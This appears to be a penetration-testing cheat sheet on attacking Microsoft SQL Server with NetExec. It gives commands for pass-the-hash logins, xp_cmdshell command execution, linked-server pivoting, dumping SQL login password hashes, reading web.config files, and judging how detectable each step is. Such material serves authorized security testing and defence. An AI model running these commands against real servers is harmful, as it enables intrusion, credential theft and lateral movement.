MSSQL Operations with NetExec
#Overview
Microsoft SQL Server (1433/TCP) is a high-value target in internal pentests. MSSQL instances often run with elevated privileges (SYSTEM, service accounts, or even Domain Admin). NetExec's MSSQL module validates credentials, checks privilege levels, and executes commands via xp_cmdshell — providing an alternative command execution path when SMB and WinRM are blocked.
#Prerequisites
- Network access to MSSQL port (1433/TCP default)
- Valid SQL credentials (Windows authentication or SQL authentication)
- NetExec installed
#Credential Validation
# Windows authentication (current domain context)
netexec mssql 10.10.10.5 -u domain_user -p pass -d domain.local
# SQL authentication (sa account or other SQL login)
netexec mssql 10.10.10.5 -u sa -p 'P@ssw0rd!'
# -u sa -> the built-in SQL admin account
# Pass-the-hash (Windows auth)
netexec mssql 10.10.10.5 -u user -H ':NTHASH'
# Local Windows auth
netexec mssql 10.10.10.5 -u administrator -p pass --local-auth
BASH
#Privilege Check
# Check if the authenticated user has sysadmin role
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_priv
# sysadmin:True → can enable xp_cmdshell and execute OS commands
# sysadmin:False → limited to database operations only
BASH
#Command Execution via xp_cmdshell
# Execute command (requires sysadmin + xp_cmdshell enabled)
netexec mssql 10.10.10.5 -u sa -p pass -x 'whoami'
# -x -> enables xp_cmdshell if disabled, then executes command
# Output shows: the SQL service account (often NT SERVICE\MSSQLSERVER or a domain account)
# Execute PowerShell
netexec mssql 10.10.10.5 -u sa -p pass -X 'Get-ChildItem C:\'
# Execute on multiple targets
netexec mssql targets.txt -u sa -p pass -x 'hostname && whoami'
BASH
#Linked Server Enumeration
# Enumerate linked servers (MSSQL trust relationships)
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_linked_servers
# Linked servers: other MSSQL instances this server can query
# Attack path: compromise one MSSQL → query linked servers → execute commands on them
BASH
#Custom Query Execution
# Execute a custom SQL query
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT @@VERSION'
# Returns: SQL Server version, OS version, patch level
# Enumerate databases
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT name FROM master.dbo.sysdatabases'
# Enumerate SQL logins
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT name, password_hash FROM master.sys.sql_logins'
# Check service account
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT servicename, service_account FROM sys.dm_server_services'
BASH
#Common Use Cases
#Check if SQL Service Runs as Domain Account
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT servicename, service_account FROM sys.dm_server_services'
# If service_account is a domain user → potential Kerberoasting target
BASH
#Extract Password Hashes from SQL Logins
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT name, password_hash FROM master.sys.sql_logins'
# SQL login hashes can be cracked offline (hashcat mode varies by SQL version)
BASH
#Execute Command on Linked Server
netexec mssql 10.10.10.5 -u sa -p pass -q "EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER_NAME]"
BASH
#Read Files via OPENROWSET
netexec mssql 10.10.10.5 -u sa -p pass -q 'SELECT * FROM OPENROWSET(BULK ''C:\inetpub\wwwroot\web.config'', SINGLE_CLOB) AS Contents'
BASH
#Common Pitfalls
- ⚠️ xp_cmdshell disabled: Modern SQL Server installations disable
xp_cmdshellby default. NetExec's-xflag attempts to enable it automatically, but this requiressysadminrole. - ⚠️ sa account locked/renamed: Many organizations disable or rename the
saaccount. You may need to find other SQL logins or use Windows authentication. - ⚠️ SQL Browser service: If MSSQL runs on a non-default port, you need the SQL Browser service (1434/UDP) to discover the dynamic port. NetExec may fail to connect.
- ⚠️ Command output truncation:
xp_cmdshelloutput is limited. For large output, redirect to a file and read it viaOPENROWSET. - ⚠️ Linked server trust direction: Linked servers are directional — Server A → Server B does NOT mean Server B → Server A. Map the trust graph carefully.
#OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | SQL login event (failed/success) |
| mssql_priv check | Low | SQL query on system views |
| xp_cmdshell enable | Medium | SQL Server configuration change log |
| Command execution | High | cmd.exe child of sqlservr.exe, process creation (4688) |
| Linked server query | Low | Normal SQL distributed query |
| OPENROWSET file read | Medium | File access audit (4663) if SACL configured |
#Post-Exploitation Value
- OS command execution → foothold on database server
- Service account compromise → if domain account, Kerberoast or use for lateral movement
- SQL login hashes → offline cracking, credential reuse
- Linked servers → lateral movement to other database instances
- File access → read web.config, connection strings, sensitive files
- Data exfiltration → dump databases with sensitive information
#Cross-References
- SMB Operations — Alternative command execution path
- WinRM Operations — Non-admin execution alternative
- Database Exploitation — General database attack techniques
- Database Enumeration — MSSQL discovery and enumeration
#Tool References
- NetExec MSSQL Documentation
- PowerUpSQL — PowerShell MSSQL attack toolkit
- mssqlclient.py (Impacket) — Interactive MSSQL client